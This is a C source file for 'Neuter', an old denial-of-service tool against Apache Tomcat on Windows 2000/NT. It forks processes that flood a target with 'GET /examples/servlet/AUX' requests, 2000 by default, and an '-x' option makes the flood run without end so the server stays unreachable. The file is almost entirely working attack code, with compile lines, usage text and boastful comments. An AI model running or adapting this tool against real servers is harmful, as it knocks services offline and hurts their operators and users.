/*  Windows 2000/NT Apache Tomcat 3.x and 4.0.x DoS
 *
 *	bug discovered by Olaf Schulz on 11 October 2002
 *	essentially does a GET /examples/servlet/AUX HTTP/1.0 ...2000 times.
 *
 *	This is actually somewhat lame.  It seemed to be a rather nice DoS
 *	if it actually killed the server after XX GET's, but that isn't the case.
 *	That's why I tossed in the '-x' option to keep hammering the box.  When
 *	this program is running, the webserver becomes inaccessible.
 *	Not the coolest thing in the world, but it gave me something to do on a boring
 *	ass monday night. :)  		-bmbr
 *
 *
 * Compile With:
 * Linux: gcc -o neuter neuter.c
 * Solaris: gcc -o neuter neuter.c -lsocket -lnsl
 *

                                    ZZZZZZZZZZZZZZZZZZZ
                                    Z:::::::::::::::::Z
                  nnnn  nnnnnnnn    Z:::::::::::::::::Z   ooooooooooo
                  n:::nn::::::::nn  Z:::ZZZZZZZ::::::Z  oo:::::::::::oo
     eeeeeeeeeee  n::::::::::::::nn ZZZZZ  * Z::::::Z  o:::::::::::::::o
   ee:::::::::::eenn:::::::::::::::n      2 Z:::::Z    o:::::ooooo:::::o
  e:::::::::::::::een:::::nnnn:::::n     0 Z:::::Z     o::::o     o::::o
 e::::::eeeee::::::en::::n    n::::n    0 Z:::::Z      o::::o     o::::o
 e:::::e     e:::::en::::n    n::::n   2 Z:::::Z       o::::o     o::::o
 e::::::eeeee::::::en::::n    n::::n  * Z:::::Z        o::::o     o::::o
 e::::::::::::::::e n::::n    n::::n   Z:::::Z         o:::::ooooo:::::o
 e:::::eeeeeeeeeee  n::::n    n::::nZZZ:::::Z     ZZZZZo:::::::::::::::o
 e::::::e           n::::n    n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
 e:::::::e          nnnnnn    nnnnnnZ:::::::::::::::::Z   ooooooooooo
  e:::::::eeeeeeeeee                Z:::::::::::::::::Z
   ee::::::::::::::e                ZZZZZZZZZZZZZZZZZZZ
    ee:::::::::::::e             \... www.enZotech.net .../
     eeeeeeeeeeeeee
                 

(The above is radical ascii art.. Respect it. The below is a lame DoS. )
																					  
*/


#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <stdlib.h>
#include <limits.h>
#include <math.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>



void usage(char* argv0);
void forkoff(char *ip, int port);
int neuter(char *ip, int port);

void sigint();
void sighup();
void sigquit();

int main(int argc, char *argv[])
{

extern int optopt;
extern char *optarg;
int errorflag = 0; /* did someone screw up? */
int port = 80;	/* default port to use unless -p */
int c;
int kill = 0;
int killhigh = 2000; /* This is how many GETS to request */
int always = 0;

if ((argc < 2) || (argc > 6))
	usage(argv[0]);

while ((c=getopt(argc, argv, "vxp:")) != EOF) {
	switch(c) {
		case 'p':
			fprintf(stderr, "Using port %s\n", optarg);
			port = strtol(optarg, NULL, 10);
			break;
		case 'x':
			fprintf(stderr, "Nonstop DoS Attack.. go get a dew..\n");
			always = 1;
			break;
		case 'v':
			fprintf(stderr, "Neuter: IIS+Apache Tomcat DoS - [Oct 15, 2002]\n");
			fprintf(stderr, "written by: bmbr@enZo\n\n");
			exit(0);
		case ':':
			fprintf(stderr, "Option -%c requires an operand\n", optopt);
			errorflag++;
			break;
		case '?':
			fprintf(stderr, "Unrecognized option: -%c\n", optopt);
			errorflag++;

	}
}

if (errorflag) {
		usage(argv[0]);
}

/* kill them */
while (kill <= killhigh) {
	forkoff(argv[argc-1], port);
	fprintf(stderr, "b00m! ");
		if (always != 1)
			kill++;
		}
fprintf(stderr, "\nFinished!\n");
return 0;
} /* end main */

void usage(char* argv0)
{
	fprintf(stderr, "\nNeuter: IIS+Apache Tomcat DoS - [Oct 15, 2002]\n");
	fprintf(stderr, "Written by: bmbr@enZo\n\n");
	fprintf(stderr, "Usage: %s [-p port] IP\n", argv0);
	fprintf(stderr, "optional: -x (don't stop DoS'ing)\n\n");
	exit(1);
}

void sigint()
{
	signal(SIGINT,sigint);
	fprintf(stderr, "CHILD: I have received Sigint!\n");
	exit(0);
}

void sigquit()
{
	fprintf(stderr, "CHILD: My parent has killed me!\n");
	exit(0);
}

void sighup()
{
	signal(SIGHUP,sighup);
	fprintf(stderr, "CHILD: I have received SIGHUP\n");
}


void forkoff(char *ip, int port)
{
		int pid;
		pid = fork();


		if (pid < 0) {
				fprintf(stderr, "Fork Error.\n");
				exit(0);
		}
		else if (pid > 0)
				usleep(1000);  /* microseconds (millionth of a sec) */
		else if (pid == 0) {
				signal(SIGHUP,sighup);
				signal(SIGINT,sigint);
				signal(SIGQUIT,sigquit);
				alarm(25);
				neuter(ip, port);
				alarm(0);
				exit(0);
		}
}

int neuter(char *ip, int port)
{
	int s, r, c;
    char *string = "GET /examples/servlet/AUX HTTP/1.0\r\n";
	char *stringend = "\r\n\r\n";

	struct sockaddr_in addr;
	struct hostent *hp;
	memset((char *) &addr, '\0', sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr(ip);
	addr.sin_port= htons(port);


	if ((hp = gethostbyname(ip)) != NULL) {
			/* need to check the size of h_length to avoid overflow */
			if (hp->h_length > sizeof(addr.sin_addr)) {
					hp->h_length = sizeof(addr.sin_addr); }

		memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
	}
	else {
		if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
			return(0);
			}
	}

	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	r = connect(s, (struct sockaddr *) &addr, sizeof(addr));

	write(s, string, strlen(string));
	write(s, stringend, strlen(stringend));
	c = 0;


	close(s);
	return 0;
}